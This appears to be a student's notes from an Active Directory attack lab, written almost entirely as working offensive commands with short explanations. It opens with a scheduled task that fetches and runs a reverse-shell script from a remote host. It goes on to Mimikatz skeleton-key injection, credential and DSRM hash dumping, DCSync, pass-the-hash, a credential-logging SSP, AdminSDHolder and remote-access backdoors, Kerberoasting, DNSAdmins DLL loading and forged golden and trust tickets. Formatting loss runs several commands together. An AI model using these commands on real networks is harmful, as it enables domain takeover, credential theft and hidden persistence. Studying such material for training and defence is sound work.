<span style="font-size: 12pt"><span style="font-family: Monaco">schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''<a href="http://172.16.100.68:8080/Invoke-PowerShellTcp.ps1">http://172.16.100.68:8080/Invoke-PowerShellTcp.ps1</a>''')'"</span></span><br/>
Execute the task<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"</span></span><br/>
<br/>
#Skeleton Key<br/>
Skeleton key is a persistence technique where it is possible to patch a Domain Controller (lsass process) so that is allows access as any user with a single password.The attack was discovered by Dell Secureworks used in a malware named the skeleton key malwareAll the publicly known methods are NOT persistent across reboots. We cannot patch lsass twice(the attack would fail)<br/>
Use the below command to inject a skeleton key (password would be mimikatz) on a Domain Controller of choice. DA privileges required<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local</span></span><br/>
Now it is possible to access any machine with a valid username and password as "mimikatz"<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\administrator</span></span><br/>
You can access other machines as well as long as they authenticate with the DC which hash been patched and the DC is not rebooted.<br/>
In case lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC<br/>
<span style="font-family: Monaco"><span style="font-size: 9pt"><span style="font-size: 12pt">privilege::debug!+!processprotect /process::lsass.exe /removemisc::skeleton!-</span></span></span><br/>
Note that above command would be very noisy in logs - Service Installation (Kernel mode driver)<br/>
<br/>
#DSRM<br/>
DSRM is Directory Services Restore Mode.There is a local administrator on every DC called "Administrator" whose password is the DSRM password. DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changes. After altering the configuration on the DC, it is  possible to pass the NTLM has of this user to access the DC. This is used when domain controller needs to be booted in safe mode.DSRM administrator is not allowed to logon over the network on the DC.<br/>
DUMP DSRM password (needs DA privs)<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local</span></span><br/>
Compare the administrator hash with the Administrator hash of the below command<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local</span></span><br/>
Since DSRM user is the local administrator of the DC, we can pass the hash to authenticate.But, the logon behavior for the DSRM account needs to be changed before we can use its hash for network logon.<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local<span style="font-size: 9pt">Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 </span><br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 9pt">New</span>-ItemPropery "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD</span></span><br/>
Use below command to pass the hash for DSRM user<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'</span></span><br/>
Try to access the C drive of the DC<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">ls \\dcorp-dc\c$</span></span><br/>
<br/>
#Custom SSP<br/>
A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft areNTLMKerberosWdigestCredSSP<br/>
Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.<br/>
We can use either of the ways:Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">$package = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'<span style="font-size: 9pt">$packages += "mimilib"</span><br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco"><span style="font-size: 9pt">Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packagesSet-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages</span></span></span><br/>
Using Mimikatz, inject into lsass (Not stable with Server 2016):<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"misc::memssp"'</span></span><br/>
All local logons on the DC are logged to<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">C:\Windows\system32\kiwissp.log</span></span><br/>
<br/>
#AdminSDHolder<br/>
Resides in the System container of a domain and used to control the permissions - Using an ACL - for certain built-in privileged groups (called Protected Groups)Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL.<br/>
With Domain Admin privileges (Full Control / Write Permissions) on the AdminSDHolder object, it can be used as a backdoor / persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object.In 60 minutes (when SDPROP runs), the user will be added with full control of the protected groups like Domain Admins without actually being a member of it. <br/>
Add FullControl permissions for a user to the AdminSDHolder as DA<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewAdd-ObjectACL -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student68 -Rights All -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD Module - With custom script (Set-ADACL)Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student68 -Verbose</span></span><br/>
Other interesting permissions (ResetPassword, WriteMembers) for a user to the AdminSDHolder<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student68 -Rights ResetPassword -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student68 -Rights WriteMembers -Verbose</span></span><br/>
Run SDPROP manually using Invoke-SDPropagator.ps1<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-SDPropagator -timeourMinutes 1 -showProgress -Verbose</span></span><br/>
Check the Domain Admins permission as normal user<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student68'}<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD Module(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student68'}</span></span><br/>
Abusing FullControl<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerView DevAdd-DomainGroupMember -Identity 'Domain Admins' -Members student68 -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleAdd-ADGroupMember -Identity 'Domain Admins' -Members student68</span></span><br/>
Abusing ResetPassword<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerView DevSet-DomainUserPassword -Identity student68 -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleSet-ADAccountPassword -Identity student68 -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose</span></span><br/>
Add FullControl rights<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewAdd-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student68 -Rights All -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleSet-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student68 -Verbose</span></span><br/>
Add rights for DCSync<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewAdd-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName student68 -Rights DCSync -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleSet-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student68 -GUIDRight DCSync -Verbose</span></span><br/>
Execute DCSync<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'</span></span><br/>
<br/>
#Security Descriptors<br/>
Persistence using ACLs specifically host based security descriptors. Once we have local admin privileges on the box it is possible to modify the security descriptor on the target system like SACL &amp; DACL etc of remote access methods such as WMI, PSRemoting, Remote Registry so that even non admin users can access it target system and execute commands remotely.<br/>
It is possible to modify Security Descriptors (security information like Owner,primary group, DACL &amp; SACL) of multiple remote access methods (securable objects) to allow access to non-admin users.Administrative privileges are required for this. It, of course, works as a very useful and impactful backdoor mechanism.<br/>
Security Descriptor Defination Language(SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL:ace_type;ace_flags;rights;object_guid;inherit_<br/>
<br/>
ACLs can be modified to allow non-admin users access to securable objectsModify the security descriptor for WMIOn local machine for student68<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#Set-RemoteWMI.ps1Set-RemoteWMI -UserName student68 -Verbose</span></span><br/>
 On remote machine for student68 without explicit credentials<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Set-RemoteWMI -UserName student68 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose</span></span><br/>
On remote machine with explicit credentials. Only root\cimv2 and nested namespaces<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Set-RemoteWMI -UserName student68 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential administrator -namespace 'root\cimv2' -Verbose</span></span><br/>
On remote machine remove permissions<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Set-RemoteWMI -UserName student68 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Remove -Verbose</span></span><br/>
Modify the security descriptor for PSRemotingOn Local machine for student 68<br/>
<span style="font-family: Monaco"><span style="font-size: 9pt"><span style="font-size: 12pt">#Set-RemotePSRemoting.ps1Set-RemotePSRemoting -UserName student68 -Verbose</span></span></span><br/>
On remote machine for student68 without credentials<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Set-RemotePSRemoting -UserName student68 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose</span></span><br/>
On remote machine, remove the permissions<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Set-RemotePSRemoting -UserName student68 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Remove -Verbose</span></span><br/>
Modify the security descriptors for Remote RegistryUsing DAMP, with admin privs on remote machine<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student68 -Verbose</span></span><br/>
As student68, retrieve machine account hash<br/>
<span style="font-family: Monaco"><span style="font-size: 9pt"><span style="font-size: 12pt">Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose</span></span></span><br/>
Retrive local account hash<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-RemoteLocalAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose</span></span><br/>
Retrieve domain cached credentials<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-RemoteCachedCredential -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose</span></span><br/>
<br/>
##Privilege Escalation<br/>
#Kerberoast<br/>
Offline cracking of service account passwordsThe kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack.Service accounts are many times ignored (passwords are rarely changed) and have privileged access. Password hashes of service accounts could be used to create silver tickets.<br/>
Find User accounts used as Service accounts<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetUser -SPN<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName</span></span><br/>
Request a TGS<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewRequest-SPNTicket</span></span><br/>
Check if the TGS has been granted<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">klist</span></span><br/>
Export all tickets using Mimikatz<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"kerberos::list /export"'</span></span><br/>
Crack the Service account password<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 1-40a10000-student68@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi</span></span><br/>
<br/>
#Targeted Kerberoasting - AS-REPs<br/>
If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline.With sufficient rights (GenericWrite or GenericAll), kerberos preauth can be forced disabled as well.<br/>
Enumerating accounts with Kerberos Preauth disabled<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerView DevGet-DomainUser -PreauthNotRequired -Verbose<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD Module Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth</span></span><br/>
Force disable Kerberos PreauthLet's enumerate the permissions for RDPUsers on ACL's<br/>
<span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#PowerView DevInvoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}</span><br/>
<span style="font-size: 9pt">Set-DomainObject -Identity Control68User -XOR @{useraccountcontrol=4194304} -Verbose</span><br/>
</span></span><span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">Get-DomainUser -PreauthNotRequired -Verbose</span></span></span><br/>
Request encrypted AS-REP for offline brute-forceLet's use ASREPRoast<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-ASREPHash -UserName VPN68User -Verbose</span></span><br/>
To enumerate all users with Kerberos preauth disabled and request a hash<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-ASREPRoast -Verbose</span></span><br/>
Cracking the hashUsing bleeding-jumbo branch of John The Ripper, we can brute-force the hashes offline<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">./john vpn68user.txt --wordlist=wordlist.txt</span></span><br/>
<br/>
#Targeted Kerberoasting - Set SPN<br/>
With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything(unique in the domain)We can then request a TGS without special privileges. The TGS can then be "kerberoasted"<br/>
Let's enumerate the permissions for RDPUsers on ACL's<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerView DevInvoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}</span></span><br/>
Check if the user already has a SPN<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerView DevGet-DomainUser -Identity support68user | select serviceprincipalname<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADUser -Identity support68user -Properties ServicePrincipalName | Select ServicePrincipalName</span></span><br/>
Set a SPN for the user (must be unique for the domain)<br/>
<span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#PowerViewSet-DomainObject -Identity support68user -Set @{serviceprincipalname='ops/whatever1'}</span><br/>
</span></span><span style="font-family: Monaco"><span style="font-size: 12pt"><span style="font-size: 9pt">#AD ModuleSet-ADUser -Identity support68user -ServicePrincipalNames @{Add='ops/whatever1'}</span></span></span><br/>
Request a ticket<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewRequest-SPNTicket</span></span><br/>
Check if the TGS has been granted<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">klist</span></span><br/>
Export all tickets using Mimikatz<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"kerberos::list /export"'</span></span><br/>
Crack the Service account password<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">python.exe .\tgsrepcrack.py .\10k-worst-pass.txt 2-40a10000-student68@ops~whatever1-DOLLARCORP.MONEYCORP.LOCAL.kirbi</span></span><br/>
<br/>
##Kerberos Delegation<br/>
<br/>
#UnConstrained Delegation<br/>
<br/>
#Constrained Delegation<br/>
Constrained Delegation when enabled on a service account, allows access only to specified services on specified computer as a user.A typical scenario where a constrained delegation<br/>
<br/>
Enumerate users and computers with constrained delegation enabled<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerView DevGet-DomainUser -TrustedToAuthGet-DomainComputer -TrustedToAuth<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo</span></span><br/>
<br/>
Priv Esc - DNS Admins<br/>
It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (System).In case the DC also serves as DNS, this will provide us escalation to DA.Need privileges to restart the DNS service.<br/>
Enumerate the members of the DNSAdmins group<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">#PowerViewGet-NetGroupMember -GroupName "DNSAdmins"<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">#AD ModuleGet-ADGroupMember -Identity DNSAdmins</span></span><br/>
Once we know the members of the DNSAdmins group, we need to compromise a member. We already have hash of srvadmin because of derivative local admin<br/>
From the privileges of DNSAdmins group member, configure DLL using dnscmd.exe (needs RSAT DNS)<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.100.68\dll\mimilib.dll</span></span><br/>
Using DNSServer module (needs RSAT DNS)<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">$dnsettings = Get-DNSServerSetting -ComputerName dcorp-dc -Verbose -All$dnsettings.ServerLevelPluginDll = "\\172.16.100.68\dll\mimilib.dll" Set-DnsServerSetting -InputObject $dnsettings -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose</span></span><br/>
#Priv Esc - Across Trust<br/>
Across Domains - Implicit two way trust relationshipAcross Forest - <br/>
#Child to Parent<br/>
Domains in same forest have an implicit two-way trust with other domains. There is trust key between the parent and child domainsThere are two ways of escalating privileges between two domains of same forest<ul><li>krbtgt hash</li>
<li>Trust tickets</li>
</ul>
<br/>
Child to forest root using trust ticketsSo what is required to forge trust tickets is obviously the trust key look for [in] trust key from child to parent<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::dcsync /user\dcorp\mcorp$"'</span></span><br/>
Child to forest root using trust ticketsAn inter-realm TGT can be forged<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /sids:S-1-5-21-560323961-2032768757-2425134131-519 /rc4:8c762f099cfe1fb57e699a915069e921 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'</span></span><br/>
Child to Forest Root using Trust Tickets Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket.<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local</span></span><br/>
Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM) can be created as well.<br/>
Child to Forest Root using Trust Tickets Use the TGS to access the targeted service (may need to use it twice).<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">ls \\mcorp-dc.moneycorp.local\c$</span></span><br/>
<br/>
We will abuse SID history once again<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::lsa /patch"'<br/>
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'<br/>
</span></span><br/>
In the above command, the mimikatz option "/sids" is forcefully setting the SID History for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group.<br/>
<br/>
#Across Forest<br/>
Across ForestsOnce again, we require the trust key for the inter-forest trust<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::trust /patch"'<br/>
OR<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"lsadump::lsa /patch"'</span></span><br/>
An inter-forest TGT can be forged<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:dollarcorp.moneycorp.local /sid: /rc4: /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi</span></span><br/>
Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">.\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local</span></span><br/>
Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM) can be created as well<br/>
<br/>
<br/>
#Trust Abuse - MSSQL Server<br/>
MSSQL server are generally deployed in plenty in a Windows domain.SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles.<br/>
Discovery (SPN Scanning)<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-SQLInstanceDomain</span></span><br/>
Check Accessibility<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-SQLConnectionTestThreaded<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose</span></span><br/>
Gather Information<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose</span></span><br/>
A database link allows a SQL Server to access external data source like other SQL Server and OLD DB data sourcesIn case of database links between SQL Servers, that is linked SQL servers it is possible to execute stored proceduresDatabase links work even across forest trusts<br/>
Searching Database LinksLook for links to remote servers<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-SQLServerLink -Instance dcorp-mssql -Verbose<br/>
OR<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">select * from master..sysservers</span></span><br/>
Enumerate Database Links - ManuallyOpenquery() function can be used to run queries on a linked database<br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">select * from openquery("dcorp-sql1",'select * from master.sysservers')</span></span><br/>
<span style="font-size: 12pt"><span style="font-family: Monaco">Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose<br/>
OR<br/>
</span></span><span style="font-size: 12pt"><span style="font-family: Monaco">select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt", 'select * from master.sysservers'))</span></span>&nbsp;</body></html>